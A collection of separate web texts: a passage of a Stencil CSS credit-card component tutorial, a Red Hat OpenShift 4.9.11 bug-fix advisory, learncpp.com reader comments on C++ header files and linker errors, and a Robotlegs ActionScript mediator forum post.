The first thing we are doing here is importing the “Roboto” font from Google Fonts. With this font imported, we can use it across our entire design system by setting the font-family of our html and body. In addition, we are declaring a few CSS variables on the :root of our project. These variables are really useful for ensuring that all our components use the same values for their styling. In our case, we are creating some variables for our font color as well as some gradients that will serve as the background of our credit cards. This setup provides us a lot of flexibility for the future. In the event we want to tweak any of these gradients, we can change them in our global styles and the change will propagate to any component that references that variable.

Styling the Component

Alright, we’ve got our global styles and the structure of our credit card component.
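One practical note on those global variables (my own suggestion, not from the article): var() accepts a second argument as a fallback, so a component can still render sensibly if the global stylesheet is missing or fails to load.

```css
/* Hypothetical usage inside a component stylesheet — the second argument
   to var() is a fallback used when the custom property is not defined. */
.card-wrapper {
  color: var(--font-color, #fff);
}

.front,
.back {
  background: var(--purple-gradient, linear-gradient(to right bottom, #a460f8, #4c48ff));
}
```

Fallbacks are most useful for components that may be embedded into pages you don’t control, where the global stylesheet link may not be present.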
Let’s start styling the component itself. Within the Host element, our credit card is composed of three main parts: a front, a back, and a wrapper for these two sides. Our wrapper is an anchor tag with a class of card-wrapper. Let’s open credit-card.css and style this first. .card-wrapper { display: block; width: fit-content; } Here, we are making the card a block-level element and fitting the width to its content (the front and back). Next, let’s style the front and back of the card. Naturally, the front and back will share a lot of styles, so let’s select both of them and specify the common styles. .front, .back { width: 400px; height: 200px; padding: 20px; border-radius: 8px; font-size: 1.125rem; display: flex; flex-direction: column; box-shadow: 4px 8px 24px rgba(0, 0, 0, 0.25); } Next, we can specify the styles unique to the front and back of the card. These styles are used to organize the layout of the content on each side of the card. Both sides already use flexbox and have set the direction to be columnwise, so now we can use justify-content and align-items to organize the children on each side. For the front, we’ll add space between the children, and for the back we’ll put the children in the bottom right corner. .front { justify-content: space-between; } .back { justify-content: flex-end; align-items: flex-end; } Finally, we can add some small changes to our row class to put space between the elements in each row of the credit card. We will also increase the font size of the card number, remove margin and padding on <p> tags, and set a reasonable height for our image. .row { display: flex; justify-content: space-between; align-items: center; } .card-number { font-size: 1.75rem; } p { margin: 0; padding: 0; } img { height: 45px; } With these styles, our component is starting to take shape. Here’s what it should look like so far: Adding Gradients Now we get to make use of those fun gradients we set in our global styles! 
We’re going to let the user choose the gradient, but we want to make sure we limit them to the three gradients we defined. This is why, when we initialized our gradient prop, we set its type to be one of three specific strings.

@Prop() gradient: 'purple' | 'green' | 'orange';

We can make these three strings serve as class names, and in doing so, we can map background styles to each class.

.purple {
  background: var(--purple-gradient);
}

.green {
  background: var(--green-gradient);
}

.orange {
  background: var(--orange-gradient);
}

These classes won’t have any effect until we add the value of the gradient prop to the front and back of the card as a class using string interpolation.

<div class={`front ${this.gradient}`}> //child elements </div>
<div class={`back ${this.gradient}`}> //child elements </div>

Now we can pass in “purple”, “green”, or “orange” to our gradient prop to use whichever gradient background we prefer. We also want to make use of our --font-color variable. Since we want our entire component to use this font color, we can set it on our card-wrapper. We can also remove the anchor tag’s default underline with text-decoration: none.

.card-wrapper {
  display: block;
  width: fit-content;
  color: var(--font-color);
  text-decoration: none;
}

Now our component is looking a bit more like our final result:

Make it Spin!

Our credit card component is looking good, but let’s liven it up a bit by adding some animation. In order for us to add animation to our component, there are a few CSS properties we will have to make use of. Let’s take a look at each of them and what they do.

- transition – this property allows us to move, or transition, between two styles in a gradual and flowing way, as opposed to an abrupt change. It is actually a shorthand property that allows us to specify the transition property, duration, and more.
- transform – this property allows us to modify, or transform, an element by translating, scaling, rotating, or skewing it.
We’ll use this property to rotate our card, and we can do so with the rotateY() function.

- rotateY() – this function is used to rotate an element around the Y axis. It takes a parameter that represents the angle of rotation.
- backface-visibility – this property allows us to set whether or not the back of an element is visible when it faces the user.
- perspective – perhaps the hardest to reason about, this property sets the distance between the screen and the user to create a 3D effect. It will make more sense when we see it in action.

With these properties in mind, the first thing we want to do is spin the card. To do that, we can use the transform property and the rotateY() function to turn the card 180 degrees. Because we only want to spin the card when we hover over it or focus on it, we’ll use the :hover and :focus pseudo-classes to specify that.

.card-wrapper:hover .front,
.card-wrapper:focus .front {
  transform: rotateY(180deg);
}

As a quick aside, we are using the :focus pseudo-class in addition to :hover for accessibility purposes. Now, when a user focuses on the credit card element with a screen reader, the contents of the front and back of the card will be read aloud.

While this transformation does work, it has a few issues. First, the change is very abrupt. We can fix this by using the transition property. To use the transition property, we need to provide the property we want to animate and the duration of the animation. For our case, we want to create a transition for the transform property and we will give it a duration of 500 ms.

The second issue is that when the card rotates, the card contents become flipped around, as if we’re looking through the card from the back. While this has its use cases, we want to hide this side of the card when it turns. We can do this by using the backface-visibility property and setting it to hidden.
These fixes will need to be made for both the front and the back of the card, so let’s add these changes where we target both the front and back class. .front, .back { width: 400px; height: 200px; padding: 20px; border-radius: 8px; font-size: 1.125rem; display: flex; flex-direction: column; box-shadow: 4px 8px 24px rgba(0, 0, 0, 0.25); transition: transform 500ms; backface-visibility: hidden; } Okay, the front of our card is animated. Now, let’s do the same to the back of the card. The back of the card should start out hidden, and rotate into view when we hover over the card. To do this, we can apply a transformation to rotate the card -180 degrees initially. A negative angle of rotation means the element will rotate counterclockwise. Because the backface-visibility is already set to hidden this rotation will make the back of the card invisible to start. .back { justify-content: flex-end; align-items: flex-end; transform: rotateY(-180deg); } When we hover over the card or focus on it, the front rotates out of view. To rotate the back into view at the same time, we can rotate the back of the card back to 0 degrees. .card-wrapper:hover .back, .card-wrapper:focus .back { transform: rotateY(0deg); } Almost there! The back of our card rotates on hover and focus, but we still need to position it in the correct location. Up until now, the back of the card has sat under the front of the card, but we want it to sit behind the front of the card. To do this, we can use absolute positioning. If we set the card wrapper to have a position of relative, we can give the card back a position of absolute to position it relative to the card wrapper like so. .card-wrapper { display: block; width: fit-content; color: var(--font-color); text-decoration: none; position: relative; } .back { position: absolute; top: 0; left: 0; justify-content: flex-end; align-items: flex-end; transform: rotateY(-180deg); } Finally, we need to set the perspective on our card wrapper to create a 3D effect. 
I’ve chosen a value of 3000px, which makes the effect fairly subtle, but feel free to play around with different values to see how the perspective property works. It becomes clearer the smaller the value. .card-wrapper { display: block; width: fit-content; color: var(--font-color); text-decoration: none; position: relative; perspective: 3000px; } Final Touch The last visual aspect of our credit card component is the magnetic strip. This is the black bar that runs across the back of the credit card. Because this element is purely decorative and doesn’t contain any content, we can build it using the ::before pseudo-element. ::before inserts content as the first child of the element we attach the selector to. This content, however, is not actually part of the DOM, making it a great tool for adding decorative content like this. To build the magnetic strip, we can add content as a child of the back of the card, and style it to look like a magnetic strip. .back::before { content: ''; display: block; position: absolute; top: 50px; left: 0; right: 0; width: 100%; height: 40px; background: rgba(0, 0, 0, 0.5); } And with that, our credit card component is complete! As you can see, there is so much you can do with CSS in Stencil, and this only scratches the surface of what’s possible. When it comes to building a design system, it is critically important to have components that are visually consistent. You can use these design elements to build other components that complement this one. I’d love to see what cool visual effects you have implemented in your Stencil components. Leave a comment below. I’m always excited to see what you build. 😀
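One small robustness tweak worth considering for the gradient prop (my own suggestion, not from the article): the template literal `front ${this.gradient}` renders a literal "undefined" class name when the gradient prop is omitted. Extracting the class computation into a tiny helper avoids that:

```typescript
// Hypothetical helper, not part of the article's component.
type Gradient = 'purple' | 'green' | 'orange';

function faceClass(face: 'front' | 'back', gradient?: Gradient): string {
  // Only append the gradient class when the prop was actually supplied,
  // so we never emit a stray "undefined" class name.
  return gradient ? `${face} ${gradient}` : face;
}
```

In the render method this would be used as `<div class={faceClass('front', this.gradient)}>`, with the same markup as before when a gradient is set.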
https://ionicframework.com/blog/advanced-stencil-component-styling/
Issued: 2021-12-13
Updated: 2021-12-13

RHBA-2021:5003 - Bug Fix Advisory

Synopsis
OpenShift Container Platform 4.9.11 bug fix update

Type/Severity
Bug Fix Advisory

Topic
Red Hat OpenShift Container Platform release 4.9.11.

(For x86_64 architecture)
$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.9.11-x86_64
The image digest is sha256:0f72e150329db15279a1aeda1286c9495258a4892bc5bf1bf5bb89942cd432de

(For s390x architecture)
$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.9.11-s390x
The image digest is sha256:21fc2e5429882e17e444704aa46da3ca65478bf78379e0bb56c676a7a138b529

(For ppc64le architecture)
$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.9.11-ppc64le
The image digest is sha256:d33109f887e8fa4562a509a9b5623c67107763307ac77ea30ba52821062c6200

- BZ - 2010374 - Multicast is broken across nodes
- BZ - 2015503 - Cloud Controller Manager Operator does not respect 'additionalTrustBundle' setting
- BZ - 2017881 - multus: add handling of pod UIDs passed from runtime
- BZ - 2022866 - Support containers with name:tag@digest
- BZ - 2023220 - ACL for a deleted egressfirewall still present on node join switch
- BZ - 2023836 - [4.9.z] use the rhcos-4.9 branch of fedora-coreos-config for the git submodule when building RHCOS 4.9
- BZ - 2024048 - OLM fails to upgrade operators immediately
- BZ - 2024751 - pod-identity-webhook starts without tls
- BZ - 2024773 - [sig-devex][Feature:ImageEcosystem][python][Slow] hot deploy for openshift python image Django example should work with hot deploy
- BZ - 2025082 - ACM policy object generated by PolicyGen conflicting with OLM Operator
- BZ - 2025697 - Update Azure Machine Spec API to accept Marketplace Images
- BZ - 2025937 - KMS resources not getting created for IBM FlashSystem storage
- BZ - 2026219 - Detail page is breaking for namespace store, backing store and bucket class.
- BZ - 2026302 - Egress IP breaks when network policies are applied
- BZ - 2026379 - aws-pod-identity-webhook go.mod version out of sync with build environment
- BZ - 2026618 - Downgrade support level for extended control plane integration to Dev Preview
- BZ - 2027485 - [4.9z] AddressManager should not call sync() from ErrorCallback
- BZ - 2027637 - (release-4.9) Gather ValidatingWebhookConfiguration and MutatingWebhookConfiguration resource definitions
- BZ - 2027672 - dpdk application with vhost-net is not able to start
- BZ - 2027864 - [4.9z] [OVN][Upgrade] After upgrade to 4.7.34 ovnkube-master pods are in CrashLoopBackOff/ContainerCreating and other multiple issues at OVS/OVN level
- BZ - 2027983 - Network operator changes ovnkube-config too early causing ovnkube-master pods to crashloop during cluster upgrade - Backport to 4.9
- BZ - 2028535 - Backing Store YAML tab on click displays a blank screen on UI
- BZ - 2028611 - Installer doesn't retry on GCP rate limiting
- BZ - 2028961 - daemonset openshift-kube-proxy/openshift-kube-proxy to have maxUnavailable 10% or 33%
- BZ - 2029297 - MON_DISK_LOW troubleshooting guide link when clicked, gives 404 error.
- BZ - 2029409 - Update defaultReleaseImageOriginal to 4.9
https://access.redhat.com/errata/RHBA-2021:5003
I actually figured it out. It appears that within Project Explorer, you can right click the file and select Properties. It's important to make sure that under the Build tab, the Debug and Release boxes are checked. Apparently, when I created the file I missed the step to check these boxes. All compiles as expected now.

So, I have been messing with the Code::Blocks editor on Gentoo and the prototype declaration doesn't appear to pull in the add.cpp file. For this reason, when building, the build fails stating that add(int, int) is not defined. Now I've tried removing the header altogether and placing the prototype declaration directly above main.cpp, and the build still fails stating that add(int, int) is not defined. I'm able to build from the command line by specifying: This process does not fail and creates the add.o executable, which runs correctly. Am I correct to assume this could be a bug in Code::Blocks? So far I'm also pretty impressed with the tutorial. Thanks for your guidance, Alex.

I figured it out! So you need main.cpp, add.cpp and add.h all in the same folder, because main is including add.h, which declares "int add()", while add.cpp defines it! Now my question is, how can you use files in different folders?

I updated the lesson to include a section on how to include files from different folders.

Sir, I want to know how to create a header file using tlib in C.

Sorry, I don't know anything about tlib.

Hi Alex - I'm having some issues with this - my code is identical to the website - and I have no add.cpp in this project. When my code is this, I get the error "add(int, int)" not defined, but when I change to this, it works. I am guessing that this is because the header file only is added when ADD_H is included somewhere in main due to the if statements - but what happens when there is more than one function prototype in the library?

I'm not sure why this is working for you. ADD_H should be meaningless. The header guard ensures that the header is not included more than once (that would lead to redefinition errors). You are allowed to have more than one function prototype in a header file.

Hey Alex, thanks for the awesome tutorial. I had major problems and confusions on how to actually write the header files, but now I understand it more. :) Why actually make header files? Why not just define the functions you need after main?

In trivial examples like the ones we're doing right now, there's really no need for header files. However, once you get into writing more complicated things, you'll use header files everywhere. They allow you to import a set of declarations to multiple source (.cpp) files with minimal effort. An analogy might be useful here: imagine every time you wanted to use std::cout, you had to copy everything related to std::cout into the top of your .cpp. For every .cpp file. That would get annoying, right? Isn't it much easier to just #include <iostream>?

Hey Alex, these tutorials are awesome! :] I'm learning a whole lot. Thank you for making them. This is probably something really obvious, but I am really confused. I'm using Microsoft Visual C++ 2008 Edition, and when I add the add.cpp file, it automatically gives me an add.h file as well. But when I open it, in the tab it says add.h [Design] and there's just a box named add, and I can't put code anywhere. I realized that there is a separate folder specifically for header files, but I couldn't create an add.h file in it, because the name is already used. So I created one with a different name (with a .h extension), and it gave me a .cpp and a .h for that, too. And the .h is still a design box. I'm probably going to feel really dumb after this, but where am I supposed to put the header code? D: I have like 8 files and I only need to use three... so confusing >: Also, the .cpp files had #include "theirname.h" on the top, should I leave that there?
Great tutorial and thanks for taking the time to respond to people's questions. I have one myself. I am using Code Blocks 8.02 with Ubuntu 9.04. main.cpp here is my add.cpp here is my add.h Now every time I try to build this program I get this error. any help with what I am doing wrong would be great. Thanks I don't see anything wrong with the code. Sounds like an OS-specific issue. Perhaps ask on a Ubuntu forum? For gcc compiler you may require to declare the function as extern "C" or the linker won't link it properly. Try the following header file what does "int" stand for or represent? int = integer, it is a basic numeric type with no decimals. How do i create a header in Dev C++? your help would be appreciated In order to create a header file in dev-cpp, in the upper-left corrner there is a 'new' button (button with a pic of a blank peice of paper on it), click on this. once the file is created, right click the filename in the left hand column, and select rename. Enter the new name for the file and put .h at the end of the name. This will state it as being a header file and thus cuase the linker to treat it as such. -Tyler WOW!!!!!!! Finally I get it. I had to have a add.cpp file and a main.cpp file and a add.h file! I'm sure I'll be reading all these tutorials over again because I can never understand everything the first time around even at a snails pace. Just knowing that I finally figured it out though is the best part and seeing my mistake from the last section makes it all the better. Thanks for the tutorials :-) I've gotten this far after my first day. But I'm sure I'll be reading these tutorials over and over to fully understand everything! Thanks again. It is always a good idea to go over good, rich materials twice. I believe that the things you learn later on (not specifically in this tutorial, but anything) will help you better understand the basics when you go over them again. 
Generally, as you build a programmer mindset and learn to think, reason and think accordingly, I believe you will also find it easier to put things into perspective, so you might finally understand basic things you never understood the first thing you saw them. excellent tutorials(thank you!) but I have 3 questions. I don't get the header file part. In the example you use add.cpp as the declaration for add(). In add.h you put in a forward declaration for add(). But why can't you define add() in the header file, isn't that more efficient since you don't need add.cpp anymore and thus less files = less work. Second question (assuming you answered my first question): You use add.cpp as a declaration file for add(), is it common to use a .cpp file with more then one declarations? Meaning multiple function declarations in one .cpp file (seems more convenient) or do you have to use multiple cpp files for multiple function declarations? My last question: Will these tutorials lead to the explaination of actually using your knowledge of c++ in developing programs? I think that's really important because: okay I learned c++, now how do I use my knowledge? Like this tutorial gives you an assignment to make a program in the end. Many thanks, keep it up! You _could_ define add() in the header file if you wanted, but this is generally not done (unless the function is trivial, like 1 or 2 statements). Header files are generally used for prototyping functions and declaring classes, and then those things are actually implemented in .cpp files. It is VERY common to have multiple functions in one .cpp file. Typically a .cpp file will contain a whole set of related function (eg. math.cpp will contain functions to do square roots, exponents, and other mathy things). To address your last question, no, not really. It's really up to you to figure out how to apply what you learn. At some point I'd love to go back and add that, but I haven't had time. :( Never mind Alex I got it. 
This tutorial is really really helpful. I wish we have a tutorial for java too, please tell me if you have one... Thanks again. Glad you got it working. Sorry, no Java tutorial from me since I don't know the language. Hi Alex, This tutorial is awesome and I cant believe I'm finally learning C++. I have a question. I was trying to compile the code you gave, it sounds crazy but should I add a header file in the header files folder or source files folder. Anyways I tried creating in both but none worked. I created the header file with .h extension. and the header file was I had an error: 1>------ Build started: Project: HelloWorld, Configuration: Debug Win32 ------ 1>Linking... 1>MSVCRTD.lib(crtexe.obj) : error LNK2019: unresolved external symbol _main referenced in function ___tmainCRTStartup 1>C:\Documents and Settings\sravan\My Documents\Visual Studio 2008\Projects\HelloWorld\Debug\HelloWorld.exe : fatal error LNK1120: 1 unresolved externals 1>Build log was saved at ":\Documents and Settings\sravan\My Documents\Visual Studio 2008\Projects\HelloWorld\HelloWorld\Debug\BuildLog.htm" 1>HelloWorld - 2 error(s), 0 warning(s) ========== Build: 0 succeeded, 1 failed, 0 up-to-date, 0 skipped ========== Please help I am badly stuck here. Thanks in advance. Amazing tutorials! It actually all makes sense LOL -- now do one on the economy for the new U.S. administration LOL Thank you very, very much for making these tutorials!!! Alex, is there a cd I can buy of these tutorials from you? Or a book you wrote? I would donate, but who knows, next week the website could be down :( Sorry, there is currently no offline version of the site. It's something I'd like to do but I just don't have the time to put it together right now. This website has been running since May 2007, so we've been up for over a year and a half. As long as the meager advertising revenue exceeds the cost of hosting the site, it'll probably be here. 
:) Header files sound really cool, because I could make a header file that had a function in it that would calculate the angle of the sun depending on the time/day of year etc., and put it on the internet for people to download :P (along with some instructions as to what functions to call in the main.cpp). I'm not advanced enough yet to calculate the angle of the sun, but that would still be cool :D I understand this whole tutorial... except I couldn't work out how to create a ".h" file :S I'm using Code::Blocks and when I create a new file it makes me save it as a ".cpp". Edit: Woooaahh never mind, I just figured it out. :D Awesome tutorials btw :)

Generally it's a better idea to define your functions in .cpp files. If you wanted, you could distribute both the .cpp (containing the code) and a .h (containing a prototype for people to #include).

Sorry about that last comment -- I figured out what I was doing wrong just as I finished posting it; I forgot to include the "using namespace std" thing. But now I have another problem: everything else compiles fine, but I keep getting a linker error. It says that I have an undefined reference to add. I don't know what I'm doing wrong. I'm using the same code, only I fixed the "namespace" issue and filled in all the missing ;'s at the end of some of the lines.

Did you actually define the add() function? If you defined it in another .cpp file (e.g. add.cpp), are you sure you are compiling that .cpp file into your program? You probably need to add it to your project or compile command line.

So I need my main program, a header file, and a separate .cpp file to define add? And how would I include the .cpp file for the add function? Would I just place it after my ADD.h header file in the "#include" list? e.g. so I made a .cpp file defining add and included it in my program (the .cpp file defining add is the same as the one in this lesson), but when I tried to compile the program, it gave me an error.
It was complaining about a linker error to win16 or something like that. To be honest, I haven't got the slightest clue what it means by win16 (except that I think it might have something to do with the Windows operating system files???).

If you're using an MS compiler, on the left-hand side you should see your project and a list of all the files included in it. If you right-click on "Source Files" and choose "Add" you can add new files or existing files to your project. That's where you need to add the file. Using #include with a .cpp file is almost never something you'll have need of.

For some reason my compiler (I'm using Bloodshed version 4.something) keeps saying that cout and cin are undeclared. I have written several programs before, including fixing Fluxx's rectangle area calculator, and they all compiled and ran smoothly up until now. I have included both iostream and my own header file (ADD.h). Here is my code: my header file for the add function is identical to yours (only I named the file ADD.h instead of add.h). I have tried rearranging them, retyping them, even writing a whole new program. I've been stuck on this for days and I can't see what I'm doing wrong. Please help me, Alex.

You forgot to put a ; (semicolon) after "enter a number to add to this: ". Also there is a spelling error in the statement: system("puase") should be "pause", and it needs a semicolon at the end.

Aaah. Nice one. Yes, that worked a charm. Thank you Alex. So the compiling syntax is: c++ mainfile.cc Include1.cc Include2.cc ... IncludeN.cc -o out.exe, where IncludeN are the N additional source files to be compiled along with mainfile. Is that a generic compiling syntax, or is this just specific to Cygwin??? Thanks again!

It's generic to gcc/unix-style compilers as far as I know.

Hey, thoroughly enjoying this tutorial too! Also the best I've seen so far online. I'm having some trouble compiling too!!
I'm using a Cygwin bash shell. I have 3 files: the first is main.cc, the next is add.cc, and lastly I have add.h. All files are contained in the same folder that I have been using for all my other programs. I have been compiling previous programs using c++ filename.cc -o filename.exe. The error message I get reads:

    "MYFOLDER/cc9iZFXR.0:main.cc(.text+0x13b): undefined reference to 'add(int,int)'
    collect2: ld returned 1 exit status"

If you can provide any advice here it would be greatly appreciated! Rich. PS I've tried changing filename.cc to filename.cpp etc.

It looks to me like the linker can't resolve the function call to add(), which means that you're probably not compiling in add.cc properly. If I remember correctly, you should be doing something like this: c++ main.cc add.cc -o out.exe

Thanks for your tutorials. I mean, not even C++ For Dummies can touch this, with the way you respond. :) It's helping me a great deal.

Thanks for this tutorial. I have a question: in the second graphic, you showed the work of the compiler and linker with source files. Why is there no arrow from add.cpp to add.h, since add.h contains only declarations (function prototypes and variables) that add.cpp implements? Thank you.

add.h would be brought in under both add.cpp and main.cpp, since they both include it. I didn't show it being brought in under add.cpp for space consideration reasons.

In the actual add.cpp, return (x + y) was stored. In add.h this statement is not part of the code. How does the compiler/linker know that the sum of x + y is needed as the result? Niels

When main.cpp #includes add.h, the function prototype for add() is imported into main.cpp. The compiler uses this add() prototype to ensure anyone calling add() is doing so correctly. Once the compiler is satisfied no syntax or type-checking errors exist, the linker takes over.
The linker's job is to combine all of the individual .cpp files into a single unit (generally an executable or DLL), and ensure that all of the function calls resolve to an actual defined function. If you forgot to include add.cpp in your project, your project would still compile okay (because the compiler could use the prototype to do type checking), but it would fail in the linker stage because the linker would be unable to resolve the call to add() to a specific function.

Thanks Alex! I had this doubt while reading the tutorial. Greatly explained. Foremost, thanks a ton for such a wonderful tutorial.

Hello Alex, first of all I would like to thank you very much for taking the time to post such a wonderful tutorial. You have mentioned namespaces, but coming from a C programming background, I never came across namespaces. Can you please explain the basics and what these namespaces are? Thank you once again. Kkamudu

I introduce the topic of namespaces in lesson 1.3a -- a first look at cout, cin, endl, namespaces, and using statements, and in more detail in lesson 7.11 on namespaces. Even though it's in chapter 7, any readers who are curious might have a look now -- I think it will be pretty comprehensible even with just the knowledge presented in chapter 1.

I used the code that you posted in the tutorial, and since I'm using Visual C++ 2008 I added #include "stdafx.h" to the top of the code, but it always comes up with these errors:

    1>------ Build started: Project: hmmm, Configuration: Debug Win32 ------
    1>Compiling...
    1>hmmm.cpp
    1>c:\my documents\visual studio 2008\projects\hmmm\hmmm\hmmm.cpp(3) : fatal error C1083: Cannot open include file: 'add.h': No such file or directory
    1>Build log was saved at " Documents\Visual Studio 2008\Projects\hmmm\hmmm\Debug\BuildLog.htm"
    1>hmmm - 1 error(s), 0 warning(s)
    ========== Build: 0 succeeded, 1 failed, 0 up-to-date, 0 skipped ==========

I have no clue what I'm doing wrong =/ BTW, so far the tutorials have been pretty good, so thanks for taking your time to write it all. Sorry, I put the code in brackets like it says but they somehow got deleted when I posted it.

The only thing I can think of is that maybe you didn't save add.h into the correct directory?

I had the same problem till I realised that of course files are saved to the last place used, so VS was saving to the multi-file project from the prior lesson. Moved the .h file to the folder for this project and it's OK.

This is a great tutorial. Thanks for the time that you put into it. I've got a question: I'm working on a dialog in a solution (in VS 2005) that contains several projects. I'm trying to access one of the classes from another project, but I keep getting a linking error. I have done a #include "headerfile.h" and have added the path to my "Additional include directories" in the property pages via the IDE. I'm unable to copy the .h file into my local directory, because it references a resource.h file located in its project. My dialog has a resource.h file of its own. Has anyone had a similar problem?

Generally you'll get a linker error when you include all the appropriate header files but don't include the actual definition of what's in the header files. I'm guessing you need to include some of the .cpp files from the other project in the project you're getting the linker error for.

Another interesting part of the tutorial. I learnt a lot about namespaces here.
Thanks again for the great tutorial :}

The problem Chase had here was due to the omission of the semicolon ";" after the prototype in his header file, and the reason it was fixed when he changed it was simply due to the fact that he defined it within the header itself instead of in a separate .cpp file. In other words, his declaration should have looked like this in his header file:

    add(int x, int y); <--- notice the semicolon.

When changed to:

    add(int x, int y) { return x + y; }

it was no longer a prototype but a definition, meaning that the add.cpp file was no longer needed, due to the fact that the definition is now also held in the header file. At least this is my understanding so far. Oh, and yes, I know his change uses a colon instead of a semicolon; I'm just guessing that it was a typo.

I had this problem too and couldn't understand what was going wrong (I was trying out the IDE Geany). Until I realised that Geany didn't compile both of the two .cpp files and link them together. When I manually compiled/linked them with g++ it worked just fine.

    'Multiply': identifier not found
    1>c:\documents and settings\jstuart\my documents\visual studio 2008\projects\program1\program1\program1.cpp(19) : error C3861: 'Add': identifier not found
    1>c:\documents and settings\jstuart\my documents\visual studio 2008\projects\program1\program1\program1.cpp(20) : error C3861: 'Subtract':
    '#include "stdafx.h"'.

First of all, thank you Alex for the excellent tutorials.
A question please, from jstuart's code: I thought he would need at least three files -- one for the header, one for the actual functions, and then one for main, e.g.:

math.h - which contains the forward declarations
math.cpp - which contains the actual function definitions
main.cpp - which will reference the .h file

Here is my code for a similar operation, using Code::Blocks:

main.cpp:

    #include <iostream>
    #include "math.h"

    int main()
    {
        using namespace std;
        cout << "3 + 4 = " << add(3, 4) << endl;
        cout << "3 - 4 = " << sub(3, 4) << endl;
        cout << "3 * 4 = " << multiply(3, 4) << endl;
        return 0;
    }

math.cpp:

    int add(int x, int y)
    {
        return x + y;
    }

    int sub(int x, int y)
    {
        return x - y;
    }

    int multiply(int x, int y)
    {
        return x * y;
    }

math.h:

    #ifndef MATH_H
    #define MATH_H

    int add(int x, int y);
    int sub(int x, int y);
    int multiply(int x, int y);

    #endif

Thank you abdul for the code. I tried to run the code above (I am using Code::Blocks on Windows 7) but kept getting errors that say:

    "undefined reference to `add(int, int)'"
    "undefined reference to `sub(int, int)'"
    "undefined reference to `multiply(int, int)'"

However, I was able to resolve this issue by adding a line of code inside the header file, the math.h file. Thank you for the nice tutorials everyone! :)

It is bad form to #include .cpp files. It sounds to me like in this case, math.cpp wasn't being compiled in the project. So instead, you have main.cpp #include math.h, which #includes math.cpp. This means the code from math.h and math.cpp gets inserted into main.cpp. That defeats much of the point of having separate files. The problem here seems to be that math.cpp wasn't added to the project correctly, or not added at all.

I ran into the same error while using the command line when I did this: instead of:

Can you please explain why we need to create the add.h file when we have forward declarations? What is its main purpose?

    // This is the start of the header guard.
    // ADD_H can be any unique name. By convention, we use the name of the header file.
    #ifndef ADD_H
    #define ADD_H

    // This is the content of the .h file, which is where the declarations go
    int add(int x, int y); // function prototype for add.h -- don't forget the semicolon!

    // This is the end of the header guard
    #endif

In the case where we have just one function we need to access from another file, we'd probably just use a forward declaration. But in code of sufficient complexity, we often have many related functions, all of which need forward declarations to be used, and we need to use those functions in more than one place. Header files vastly simplify that process. For example, it's much easier to #include one header than to add individual forward declarations for functions named add, subtract, multiply, divide, square root, exponent, circumference, etc...

@ALEX.. Lol, then we can make another .cpp file (A) where all the other functions' forward declarations have been made, and forward declare (A) in the main program... Header files just make the compilation slower, as each time the program compiles, all the data from the header file is simply copy-pasted... What is the main advantage of a header file? lol thanx

This won't work -- you can't forward declare a file. That's what #includes are for. The main advantage of a header file is to import a set of declarations into any file that needs it. Header files typically contain forward declarations for functions defined in other files, as well as custom defined types that need to be used (enums, classes, etc...).

Gotcha. (By "bad" I mean I got it, thanx.)
https://www.learncpp.com/cpp-tutorial/header-files/comment-page-1/
Extend Mediators (for Roland)

Because the thread was closed, I am opening a new one. I've done exactly what you are attempting to do. It's very straightforward. I have an abstract WindowMediator for my Window class (which extends Sprite) and then I create concrete WindowMediators that extend WindowMediator. The abstract has a protected var window:Window, and in the onRegister of the concrete mediator I set window = the injected concrete view.

    public class WindowMediator extends Mediator implements IMediator
    {
        protected var window:Window;

        public function WindowMediator()
        {
            super();
        }

        override public function onRegister():void
        {
            eventMap.mapListener(window, Event.CLOSE, onWindowClose, Event);
            eventMap.mapListener(window, Event.ACTIVATE, onWindowActivate, Event);
            eventMap.mapListener(window, Event.DEACTIVATE, onWindowDeactivate, Event);
            eventMap.mapListener(window, Event.ADDED_TO_STAGE, onAddedToStage, Event);
            eventMap.mapListener(window, NativeWindowBoundsEvent.RESIZE, onWindowBounds, NativeWindowBoundsEvent);
            eventMap.mapListener(window, NativeWindowBoundsEvent.MOVE, onWindowBounds, NativeWindowBoundsEvent);
            eventMap.mapListener(window, SystemControlsEvent.CLOSE_WINDOW, onSystemControlClose, SystemControlsEvent);
            eventMap.mapListener(window, SystemControlsEvent.MAXIMIZE_WINDOW, onSystemControlMaximize, SystemControlsEvent);
            eventMap.mapListener(window, SystemControlsEvent.MINIMIZE_WINDOW, onSystemControlMinimize, SystemControlsEvent);
            eventMap.mapListener(window, SystemControlsEvent.RESTORE_WINDOW, onSystemControlRestore, SystemControlsEvent);
            super.onRegister();
        }

        protected function onAddedToStage(event:Event):void
        {
            // initialization
        }

        protected function onWindowClose(event:Event):void
        {
            var owner:Window = (window is ModalWindow) ? ModalWindow(window).owner : null;
            dispatch(new WindowLifeEvent(WindowLifeEvent.DESTROY, null, window.uid, owner));
        }

        protected function onWindowActivate(event:Event):void
        {
            dispatch(new ApplicationWindowEvent(ApplicationWindowEvent.ACTIVATE, window.uid));
        }

        protected function onWindowDeactivate(event:Event):void
        {
            dispatch(new ApplicationWindowEvent(ApplicationWindowEvent.DEACTIVATE, window.uid));
        }

        protected function onWindowBounds(event:NativeWindowBoundsEvent):void
        {
            dispatch(new ApplicationWindowEvent(ApplicationWindowEvent.BOUNDS, window.uid, event.afterBounds));
        }

        protected function onSystemControlClose(event:SystemControlsEvent):void
        {
            window.nativeWindow.close();
        }

        protected function onSystemControlMaximize(event:SystemControlsEvent):void
        {
            window.nativeWindow.maximize();
        }

        protected function onSystemControlMinimize(event:SystemControlsEvent):void
        {
            window.nativeWindow.minimize();
        }

        protected function onSystemControlRestore(event:SystemControlsEvent):void
        {
            window.nativeWindow.restore();
        }
    }

    public class PanelWindowMediator extends WindowMediator implements IMediator
    {
        [Inject]
        public var model:PanelModel;

        [Inject]
        public var panelWindow:PanelWindow;

        public function PanelWindowMediator()
        {
            super();
        }

        override public function onRegister():void
        {
            window = panelWindow;
            panelWindow.panel = model.getPanel(window.uid);
            super.onRegister();
        }

        override protected function onWindowClose(event:Event):void
        {
            model.closeWindow(panelWindow.panel);
            super.onWindowClose(event);
        }
    }

Comments are currently closed for this discussion. You can start a new one.

Support Staff 1 Posted by Shaun Smith on 19 Feb, 2010 09:24 AM

Hi Steven, which thread was closed? I thought that even if an issue was "resolved" it could still be re-opened by anyone adding a new comment.
Also, as this thread is marked as private (I noticed that on your last thread as well), I think it's only visible to yourself and members of the Robotlegs support team (3 of us at the moment).

2 Posted by stevensacks on 11 Mar, 2010 01:14 AM

